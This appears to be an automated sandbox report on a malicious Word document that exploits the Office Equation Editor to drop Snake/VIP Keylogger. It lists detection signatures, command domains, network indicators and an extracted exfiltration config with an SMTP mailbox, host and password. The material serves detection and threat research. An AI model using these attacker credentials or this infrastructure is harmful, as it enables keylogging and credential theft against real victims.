Windows Analysis Report
0225139776.docx.doc

Overview

General Information

Sample name: 0225139776.docx.doc
Analysis ID: 1520577
MD5: f25ef2223bc81c701a2e40dc952d4d0d
SHA1: 5fb9f3c608bc44ec4c169e51f18409a93245e8fe
SHA256: 7e00eaee75fe1d2f2b49ebf83b5c9043f2b4143e8cc87e17ef4a440cc67e604f
Tags: docuser-lowmal3

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains an external reference to another file
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Microsoft Office drops suspicious files
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: http://aborters.duckdns.org:8081 URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 URL Reputation: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\193318D4.doc Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\millizxc[1].doc Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exe Avira: detection malicious, Label: HEUR/AGEN.1309880
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Avira: detection malicious, Label: HEUR/AGEN.1309880
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{15013EC6-ED12-459C-8C4F-9B4A7E95BCBA}.tmp Avira: detection malicious, Label: EXP/CVE-2018-0798.Gen
Source: 10.2.millitingacy20306.exe.3249300.3.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "millilog@mobiloilandgas.top", "Password": "7213575aceACE@@ ", "Host": "cp1.virtualine.org", "Port": "25"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exe ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe ReversingLabs: Detection: 52%
Source: 0225139776.docx.doc ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Joe Sandbox ML: detected

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 66.63.187.123 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\millitingacy20306.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49184 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003DEB89h 13_2_003DE8A8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003D9743h 13_2_003D9330
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003D767Dh 13_2_003D7490
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003D8007h 13_2_003D7490
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003D9181h 13_2_003D8EC2
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 13_2_003D7035
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003DF4B9h 13_2_003DF1D9
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003DE6F1h 13_2_003DE325
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003DFDE9h 13_2_003DFB08
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003DF021h 13_2_003DED40
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003DF951h 13_2_003DF670
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 003D9743h 13_2_003D9672
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006198CAh 13_2_006195D0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006185AAh 13_2_006182B0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00613A09h 13_2_00613760
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061A25Ah 13_2_00619F60
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00612339h 13_2_00612068
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061CD62h 13_2_0061CA68
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00610C41h 13_2_00610970
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00617A41h 13_2_00617770
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061F86Ah 13_2_0061F570
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00616349h 13_2_00616078
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00618A72h 13_2_00618778
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00610311h 13_2_00610040
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00617111h 13_2_00616E40
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00618F3Ah 13_2_00618C40
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00615A19h 13_2_00615748
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061BA42h 13_2_0061B748
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00614321h 13_2_00614050
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061E54Ah 13_2_0061E250
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061A722h 13_2_0061A428
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00613101h 13_2_00612E30
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061D22Ah 13_2_0061CF30
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00611A09h 13_2_00611738
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061FD32h 13_2_0061FA38
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006127D1h 13_2_00612500
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006110D9h 13_2_00610E08
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00617F7Ah 13_2_00617C08
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00619402h 13_2_00619108
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006167E2h 13_2_00616510
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061BF0Ah 13_2_0061BC10
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006150E9h 13_2_00614E18
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061EA12h 13_2_0061E718
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00615EB1h 13_2_00615BE0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061EEDAh 13_2_0061EBE0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006147B9h 13_2_006144E8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061ABEAh 13_2_0061A8F0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061D6F2h 13_2_0061D3F8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061DBBAh 13_2_0061D8C0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00613599h 13_2_006132C8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00611EA1h 13_2_00611BD0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006107A9h 13_2_006104D8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 006175A9h 13_2_006172D8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061C3D2h 13_2_0061C0D8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00611571h 13_2_006112A0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061C89Ah 13_2_0061C5A0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00616C79h 13_2_006169A8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061F3A2h 13_2_0061F0A8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00615581h 13_2_006152B0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00613E89h 13_2_00613BB8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061B0B2h 13_2_0061ADB8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00614C51h 13_2_00614980
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061B57Ah 13_2_0061B280
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0061E082h 13_2_0061DD88
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00612C69h 13_2_00612998
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00619D92h 13_2_00619A98
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0073033Ah 13_2_00730040
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00731B22h 13_2_00731828
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0073330Ah 13_2_00733010
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00731FEAh 13_2_00731CF0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 007337D2h 13_2_007334D8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00731192h 13_2_00730E98
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0073297Ah 13_2_00732680
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 0073165Ah 13_2_00731360
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00732E42h 13_2_00732B48
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00730802h 13_2_00730508
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00730CCAh 13_2_007309D0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 007324B3h 13_2_007321B8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 00733C9Ah 13_2_007339A0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B6B91h 13_2_008B68E8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B5A31h 13_2_008B5788
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BE1C5h 13_2_008BDE88
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BD429h 13_2_008BD180
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B4D29h 13_2_008B4A80
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B7441h 13_2_008B7198
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B6739h 13_2_008B6490
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BF579h 13_2_008BF2A8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B8E51h 13_2_008B8BA8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B8149h 13_2_008B7EA0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B9B59h 13_2_008B98B0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B3771h 13_2_008B34C8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BBE71h 13_2_008BBBC8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BB169h 13_2_008BAEC0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B5181h 13_2_008B4ED8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BD881h 13_2_008BD5D8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BCB7Bh 13_2_008BC8D0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B4479h 13_2_008B41D0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B5E89h 13_2_008B5BE0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BE7B1h 13_2_008BE4E0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B85A1h 13_2_008B82F8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B7899h 13_2_008B75F0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B92A9h 13_2_008B9000
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BB5C1h 13_2_008BB318
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BF0E1h 13_2_008BEE10
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BCFD1h 13_2_008BCD28
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B48D1h 13_2_008B4628
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BC2C9h 13_2_008BC020
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B3BC9h 13_2_008B3920
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B62E1h 13_2_008B6038
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B55D9h 13_2_008B5330
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BDCD9h 13_2_008BDA30
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B7CF1h 13_2_008B7A48
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BFA11h 13_2_008BF740
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B6FE9h 13_2_008B6D40
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B9701h 13_2_008B9458
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B89F9h 13_2_008B8750
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BAD11h 13_2_008BAA68
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B4021h 13_2_008B3D78
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BC721h 13_2_008BC478
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BEC49h 13_2_008BE978
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008BBA19h 13_2_008BB770
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then jmp 008B3319h 13_2_008B3070
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 13_2_00C55F38
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 13_2_00C52AF9
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 13_2_00C52B00
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 13_2_00C55F28
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: api.telegram.org
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 193.122.130.0:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 193.122.6.168:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 193.122.130.0:80
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 132.226.247.73:80
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 193.122.130.0:80
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
